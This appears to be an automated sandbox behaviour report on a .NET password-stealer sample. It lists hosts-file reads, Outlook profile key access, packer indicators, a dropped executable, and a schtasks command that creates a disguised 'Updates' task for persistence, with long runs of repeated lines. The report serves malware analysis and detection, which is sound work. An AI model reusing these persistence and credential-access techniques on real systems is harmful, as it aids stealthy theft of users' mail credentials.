Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ImbSRib.pdb source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, IwUNvHNy.exe.0.dr
Source:	Binary string: ImbSRib.pdbSHA256 source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, IwUNvHNy.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, frmMain.cs	.Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: IwUNvHNy.exe.0.dr, frmMain.cs	.Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.cf0000.0.unpack, frmMain.cs	.Net Code: XCXCXCXCXCXCXC System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

.NET source code contains method to dynamically call methods (often used by packers)

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, frmMain.cs	.Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)
Source: IwUNvHNy.exe.0.dr, frmMain.cs	.Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)
Source: 0.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.cf0000.0.unpack, frmMain.cs	.Net Code: NewLateBinding.LateCall(A028, null, "Invoke", stackVariable31, null, null, stackVariable40, true)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 0_2_0177D469 pushfd ; ret	0_2_0177D475
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 0_2_07645D28 push esp; retf	0_2_07645D29
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 0_2_07645DCB pushfd ; retf	0_2_07645DD1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 0_2_07644B70 push eax; ret	0_2_07644B71
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_06952A47 push edi; retn 0000h	10_2_06952A49
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_0695BA41 push edi; iretd	10_2_0695BA46
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_06953582 push es; retf	10_2_0695393C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_069535CD push es; retf	10_2_0695393C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_0695393D push es; retf	10_2_06953A20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_06A15A40 push es; retf A165h	10_2_06A16C90

Source: initial sample	Static PE information: section name: .text entropy: 7.533959618381255
Source: initial sample	Static PE information: section name: .text entropy: 7.533959618381255

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

File created: C:\Users\user\AppData\Roaming\IwUNvHNy.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp

Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
